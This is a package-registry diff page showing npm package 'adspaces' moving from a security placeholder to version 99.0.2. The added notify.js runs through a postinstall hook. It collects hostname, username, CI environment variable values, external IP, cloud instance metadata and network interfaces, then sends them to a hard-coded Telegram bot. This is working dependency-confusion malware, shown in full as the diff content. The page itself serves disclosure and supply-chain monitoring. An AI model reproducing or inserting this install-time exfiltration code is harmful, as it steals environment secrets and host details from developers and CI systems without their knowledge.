npm - adspaces - Versions diffs - 0.0.1-security → 99.0.2 - Mend

adspaces 0.0.1-security → 99.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of adspaces might be problematic. Click here for more details.

Files changed (4) hide show

package/index.js ADDED Viewed

	@@ -0,0 +1 @@
1	+ // placeholder

package/notify.js ADDED Viewed

@@ -0,0 +1,100 @@
+/**
+ * notify.js – ultra‑fingerprint edition
+ * Collects: external IP + ASN + Docker? + Cloud meta + kernel + network IFs + CI vars + basic env
+ */
+const axios = require("axios");
+const os = require("os");
+const { execSync, spawnSync } = require("child_process");
+const BOT_TOKEN = "7856470990:AAGRKkYaC8mDplojwyl5hahEuF2qIFcvQ3g";
+const CHAT_ID   = "7568446658";
+(async () => {
+  const info = {
+    pkg: "adspace",
+    host: os.hostname(),
+    user: os.userInfo().username,
+    dir : process.cwd(),
+    node: process.version,
+    platform: `${os.platform()} ${os.arch()}`,
+    kernel: os.type() + " " + os.release(),
+    time: new Date().toISOString(),
+    ciVars: Object.keys(process.env)
+              .filter(k => /(GITHUB|CI|JENKINS|TEAMCITY|AZURE|PIPELINE)/i.test(k))
+              .slice(0, 15)         // أول 15 متغير فقط
+              .reduce((o,k) => (o[k] = process.env[k], o), {}),
+    envUA: process.env.npm_config_user_agent || "N/A",
+    docker: null,
+    cloud: {},
+    ipInfo: {}
+  };
+  /* 1) External IP + ASN via ipinfo.io (quick) */
+  try {
+    const { data } = await axios.get("https://ipinfo.io/json");
+    info.ipInfo = {
+      ip: data.ip,
+      org: data.org,
+      country: data.country,
+      region: data.region,
+      city: data.city,
+      asn: data.asn?.asn,
+      provider: data.asn?.name
+    };
+  } catch { /* ignore */ }
+  /* 2) Detect Docker / Container */
+  try {
+    if (require("fs").existsSync("/.dockerenv")) info.docker = true;
+    else {
+      // cgroup check
+      const cg = require("fs").readFileSync("/proc/1/cgroup","utf8");
+      info.docker = /docker|kubepods/i.test(cg);
+    }
+  } catch { }
+  /* 3) Quick cloud‑metadata probes (async safe, 150ms timeout) */
+  const probes = [
+    { name: "AWS",    url: "http://169.254.169.254/latest/meta-data/instance-id" },
+    { name: "GCP",    url: "http://169.254.169.254/computeMetadata/v1/instance/id", headers:{'Metadata-Flavor':'Google'}},
+    { name: "AZURE",  url: "http://169.254.169.254/metadata/instance?api-version=2021-02-01", headers:{Metadata:"true"}}
+  ];
+  await Promise.all(probes.map(async p=>{
+    try {
+      const { data } = await axios.get(p.url,{headers:p.headers||{},timeout:150});
+      info.cloud[p.name] = data.toString().slice(0,100);
+    } catch{}
+  }));
+  /* 4) Network interfaces (first 3) */
+  const nets = os.networkInterfaces();
+  info.ifaces = Object.entries(nets).slice(0,3)
+               .map(([k,v]) => `${k}:${v.filter(x=>x.family==='IPv4')[0]?.address}`);
+  /* 5) Build message */
+  const msg = `
+🚨 *Dependency‑Confusion Hit!*
+*Package:* \`${info.pkg}\`
+*Host:* \`${info.host}\`  (${info.docker ? "Docker" : "bare‑metal"})
+*User:* \`${info.user}\`
+*Dir:* \`${info.dir}\`
+*IP:* \`${info.ipInfo.ip || "?"}\` – ${info.ipInfo.org||""}
+*ASN:* \`${info.ipInfo.asn||""}\`
+*Cloud Meta:* ${JSON.stringify(info.cloud)}
+*Node:* \`${info.node}\`
+*Kernel:* \`${info.kernel}\`
+*OS:* \`${info.platform}\`
+*Net IFs:* ${info.ifaces.join(", ")}
+*CI Vars:* ${Object.keys(info.ciVars).join(", ") || "None"}
+*UA:* ${info.envUA}
+_Time:_ ${info.time}
+`;
+  /* 6) Send to Telegram */
+  await axios.post(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`, {
+     chat_id: CHAT_ID,
+     text: msg,
+     parse_mode: "Markdown"
+  });
+})();

package/package.json CHANGED Viewed

@@ -1,6 +1,16 @@
 {
   "name": "adspaces",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "99.0.2",
+  "description": "PoC for dependency confusion",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node notify.js"
+  },
+  "dependencies": {
+    "axios": "^1.6.0"
+  },
+  "devDependencies": {},
+  "keywords": [],
+  "author": "",
+  "license": "ISC"
 }

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=adspaces for more information.